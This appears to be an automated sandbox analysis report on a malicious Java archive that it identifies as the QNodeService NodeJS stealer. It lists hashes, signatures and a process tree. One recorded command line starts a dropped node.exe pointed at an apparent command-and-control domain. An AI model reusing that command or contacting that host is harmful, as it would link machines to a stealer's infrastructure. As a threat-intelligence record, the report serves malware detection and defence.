Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10_x64 -
resource
win10 -
submitted
26-10-2020 10:15
Static task
static1
Behavioral task
behavioral1
Sample
Advise_65800_1020.jar
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Advise_65800_1020.jar
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
Advise_65800_1020.jar
-
Size
74KB
-
MD5
4956848c584407a402db410818282d15
-
SHA1
15925de14ab6eb4380258aee08338b0f5754edcb
-
SHA256
0426d4c5a5d65165faf65b129833c0b316c2839c06bc51c7379851d7e879ae93
-
SHA512
81f029ff447c2b9e7a9bbe5aa7ed7a84fc6cb3adcde3bc8baa5cbce895a613222119c28f3f8be31083c30ceee7185a57790369a73a6f3bbbd55328526d163b1d
Score
10/10
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 1 IoCs
pid Process 3768 node.exe -
JavaScript code in executable 1 IoCs
resource yara_rule behavioral2/files/0x000100000001ab68-174.dat js -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3768 node.exe 3768 node.exe 3768 node.exe 3768 node.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3984 wrote to memory of 3964 3984 java.exe 75 PID 3984 wrote to memory of 3964 3984 java.exe 75 PID 3964 wrote to memory of 3768 3964 javaw.exe 79 PID 3964 wrote to memory of 3768 3964 javaw.exe 79
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\Advise_65800_1020.jar1⤵
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\66c993a4.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain holdlozx.riepsol.com --hub-domain localhost3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3768
-
-